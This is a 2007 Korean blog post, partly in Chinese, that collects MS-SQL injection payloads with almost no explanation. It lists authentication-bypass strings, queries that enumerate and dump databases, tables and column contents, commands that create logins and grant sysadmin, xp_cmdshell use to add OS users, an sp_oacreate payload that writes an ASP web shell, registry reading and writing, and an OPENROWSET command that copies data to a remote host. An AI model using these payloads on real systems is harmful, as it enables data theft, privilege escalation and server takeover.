SQL Injection 기법 정리 #2

프로그래밍/MS-SQL | 2007. 11. 22. 17:38
Posted by 손반장님

1. 인젝션 기본

1.http://xxx.xxx.xxx?id=1 and [조회]
select * from table where id=1 and [조회]

2.http://xxx.xxx.xxx?name=test' and [조회] and ''='
select * from table where name='test' and [조회] and ''=''

3.http://xxx.xxx.xxx?query=' and [조회] and '%25'='
select * from table where query like '%' and [조회] and '%'='%'


 1)' or''='
 2) ' or 1=1--
 3) ' or 'a'='a--
 4) 'or'='or'
 5) " or 1=1--
 6)or 1=1--
 7) or 'a='a
 8)" or "a"="a
 9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1


2. 데이터베이스 정보 조회

0.버전 확인
and 1=(select @@VERSION)

http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)


1.권한 확인
1)서버 역할의 멤버:
and 1=(IS_SRVROLEMEMBER('sysadmin'))
sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin
2)데이터베이스 역할의 멤버:
and 1=(IS_MEMBER('db_owner'))
3)判断是否支持多句执行
;declare @a int;--


2.DB이름 확인

and 0<>db_name()

http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name()

3.사용자 확인

and user>0


4.得到库名
sysdatabases内dbid为1-6的是系统自建表
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)


5.得到表名
and 0<>(select top 1 name from master.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 10 * name from master.dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')


6.得到字段名
1)得到表的id
and 0<>(select count(*) from master.dbo.sysobjects where xtype='U' and name=char(97)%2Bchar(98)%2Bchar(99) and uid>(str(id)))
2)用得到的id查询列
and 0<>(select top 1 name from master.dbo.syscolumns where id=235147883)
and 0<>(select top 1 name from (select top 10 name from master.dbo.syscolumns where id=235147883 order by name asc) as table1 order by name desc)


7.得到字段内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名)
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名 where 字段名 not in('已得到内容'))
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)


3. 기타 정보

0.계정 정보 변경
;exec sp_addlogin '아이디', '패스워드';--
;exec sp_password '이전 패스워드', '새로운 패스워드', '아이디';--
;exec master.dbo.sp_addsrvrolemember '아이디' 'sysadmin';--
;exec sp_droplogin '아이디';--


1.cmd 명령어
1)xp_cmdshell 프로시저 등록
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.sp_dropextendedproc 'xp_cmdshell';--
;dbcc addextendedproc ("xp_cmdshell","xplog70.dll");--
2)xp_cmdshell 실행
;exec master..xp_cmdshell 'ping 111.222.333.444';--
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\';--
;exec master..xp_cmdshell 'echo 要写入内容>>绝对路径';--
3)回显
;Drop table cmd_list ;CREATE TABLE cmd_list (ComResult nvarchar(8000)) INSERT cmd_list EXEC MASTER..xp_cmdshell 'ipconfig -all';--
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from comd_list where 1=1)>0


2.윈도우 서비스 제어
;exec master.dbo.xp_servicecontrol 'start', 'schedule';--


3.利用SP_OAcreate,SP_OAMETHOD执行对象
1)복원
;exec master.dbo.sp_addextendedproc 'sp_OACreate','odsole70.dll';--
;dbcc addextendedproc ("sp_OACreate","odsole70.dll");--
2)실행
;DECLARE @o INT EXEC SP_OAcreate 'wscript.shell',@o OUT EXEC SP_OAMETHOD @o,'run',null, 'J:\WINDOWS\system32\cmd.exe /c net user aaa3 /add';--
;declare @o int,@f int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'j:\foo5.asp',1 exec sp_oamethod @f,'writeline',NULL,'<% set o=server.createobject("wscript.shell")' exec sp_oamethod @f,'writeline',NULL,'o.run(request.querystring("cmd")) %>'


4.浏览目录
1)创建临时表
;create table temp1(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
2)获得当前所有驱动器
;insert temp1(id,num1,num2,num3) exec master.dbo.xp_availablemedia;--
3)获得当前子目录列表
;insert into temp(id,num1) exec master.dbo.xp_subdirs 'c:\';--
4)获得所有子目录的目录树结构
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
5)搜索文件
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
6)读取表中内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)


5.从文件导入到表中
;create table 表名(line varchar(8000));--
;bulk insert 表名 from '绝对路径';--


6.레지스트리 제어

1)레지스트리 값 exec xp_regenumvalues
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run';--
2)레지스트리 키 xp_regread
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir';--
3)레지스트리 쓰기 xp_regwrite
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_SZ','hello';--
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_DWORD','6';-- 
4)레지스트리 값 삭제 xp_regdeletevalue
;exec master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName';--
5)레지스트리 키 삭제 xp_regdeletekey
;exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey';--


7.기타 유용한 프로시저
xp_msver       Microsoft SQL Server 정보
xp_enumdsn      ODBC 정보
xp_ntsec_enumdomains 도메인정보
xp_logininfo     Microsoft SQL Server 로그인 정보
sp_configure     컨피그레이션
sp_helpextendedproc  프로시저 리스트


4. 复制远程数据库(反向连接)
;insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=password;Network=DBMSSOCN;Address=111.222.333.444,1433;', 'select * from dest_table') select * from src_table;--


5. 备份数据库
1)首次完整备份
;backup database 데이터베이스 to disk='경로';--
2)差异备份,生成文件较小
;backup database 데이터베이스 to disk='경로' WITH DIFFERENTIAL,FORMAT;--


그외 자료

http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security&Number=581860&page=0&view=collapsed&sb=5&o=31&fpart
